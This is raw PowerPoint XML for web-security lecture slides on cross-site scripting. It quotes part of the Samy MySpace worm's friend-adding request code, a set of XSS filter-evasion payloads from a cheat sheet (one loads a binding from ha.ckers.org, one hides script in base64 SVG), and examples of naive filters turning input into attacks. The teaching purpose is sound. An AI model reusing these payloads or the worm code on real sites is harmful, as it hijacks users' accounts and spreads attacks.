                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>']='11851658';AS['submit']='Add to Friends';httpSend2('/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>index.cfm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fuseaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>invite.addFriendsProcess&amp;Mytoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>='+AR,nothing,'POST',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>paramsToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BJ,BH,true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Type','application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/x-www-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>formurlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>xmlhttp2.setRequestHeader('Content-Length',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BK.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)}xmlhttp2.send(BK);return true}"&gt;&lt;/DIV&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95BDDA05-94C4-2D4D-99AC-98DF85D7D067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8513449" y="473317"/>
            <a:ext cx="3021981" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>namb.la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/popular/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>tech.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2719411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9FDDA46B-5E10-4A4B-B314-C17018970040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>31 Flavors of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E18CAC6C-3EAD-C34C-8822-80AC8AAB8AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="10058400" cy="4112286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;BODY ONLOAD=alert('XSS')&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>¼script¾alert(¢XSS¢)¼/script¾</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;XML ID="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>"&gt;&lt;I&gt;&lt;B&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>lt;IMG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> SRC="javas&lt;!-- --&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>cript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>('XSS')"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;STYLE&gt;BODY{-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>moz-binding:url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>("http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ha.ckers.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xssmoz.xml#xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>")}&lt;/STYLE&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;SPAN DATASRC="#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>" DATAFLD="B" &lt;DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;EMBED SRC="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>data:image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>svg+xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>AllowScriptAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>"&gt;&lt;/EMBED&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96261" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78FC23AE-E55A-4849-8065-6D50A726EC6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8221640" y="463907"/>
            <a:ext cx="3466013" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Source: XSS Filter Evasion Cheat Sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B21BA1-5FF7-4549-86C6-759DD8B16B14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9040505" y="5064150"/>
            <a:ext cx="2084695" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99CC"/>
          </a:solidFill>
          <a:ln w="19050">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90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What do you think is this code doing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD13BB3-EE6E-324F-8000-F174FC00C038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8431853" y="5207736"/>
            <a:ext cx="608652" cy="93313"/>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 name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7367F862-256E-1D48-80DF-2D97A2BFCB91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9323704" y="1644862"/>
            <a:ext cx="2363949" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All of these are browser-specific</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21224654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76" name="Rectangle 75">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97282" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B7BED69-3B71-1D41-8FAC-2AFE7DC24397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676240" y="875324"/>
            <a:ext cx="3536510" cy="5093520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problems with Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52229" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92CCF63A-5405-1342-AF1F-36BB4BE218C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478123" y="559477"/>
            <a:ext cx="6249057" cy="5475563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Suppose a filter removes &lt;script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=“…”  becomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>    	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=“…”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>scriptipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=“…”  becomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>		&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=“…”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Removing special characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>java&amp;#x09;script – blocked, &amp;#x09 is horizontal tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>java&amp;#x26;#x09;script – becomes java&amp;#x09;script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Need to loop and reapply until nothing found</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8EF84E-3186-3744-8279-5BC6B6B36EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9842321" y="1951630"/>
            <a:ext cx="2117269" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filter transforms input into attack!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81531D3-2B03-E14F-95A2-B0D056DF9F43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8572680" y="2775133"/>
            <a:ext cx="1513800" cy="560520"/>
            <a:chOff x="8572680" y="2775133"/>
            <a:chExt cx="1513800" cy="56052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AB7A8EB-CB5F-F54D-9ADB-AF1238003BC3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8572680" y="2775133"/>
                <a:ext cx="1513800" cy="388800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Ink 2">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AB7A8EB-CB5F-F54D-9ADB-AF1238003BC3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8554680" y="2757493"/>
                  <a:ext cx="15494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7CEEB70-BA01-5646-B636-0CF64B54CF8F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8589960" y="3185533"/>
                <a:ext cx="173520" cy="150120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="4" name="Ink 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07CEEB70-BA01-5646-B636-0CF64B54CF8F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8572320" y="3167893"/>
                  <a:ext cx="209160" cy="185760"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A67F7688-C0F7-AB4B-ACA2-C9772E273EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
